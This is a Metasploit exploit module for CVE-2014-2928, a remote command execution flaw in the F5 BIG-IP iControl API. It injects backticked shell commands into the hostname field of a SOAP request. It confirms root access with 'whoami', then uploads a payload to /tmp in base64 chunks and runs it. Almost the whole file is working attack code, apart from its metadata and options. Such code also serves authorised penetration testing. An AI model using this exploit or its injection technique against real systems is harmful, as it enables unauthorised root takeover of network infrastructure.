1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "F5 iControl Remote Root Command Execution",
'Description' => %q{
This module exploits an authenticated remote command execution
vulnerability in the F5 BIGIP iControl API (and likely other
F5 devices).
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' # Discovery, Metasploit module
],
'References' =>
[
['CVE', '2014-2928'],
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 iControl', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 17 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
], self.class)
end
def check
get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
hostname = $1
send_cmd("whoami")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
new_hostname = $1
if new_hostname == "root.a.b"
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>#{hostname}</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def send_cmd(cmd)
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>`#{cmd}`.a.b</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
end
def exploit
filename = Rex::Text.rand_text_alpha_lower(5)
print_status('Sending payload in chunks, might take a small bit...')
i = 0
while i < payload.encoded.length
cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
send_cmd(cmd)
i = i + 5
end
print_status('Triggering payload...')
send_cmd("sh /tmp/#{filename}")
end
end
|
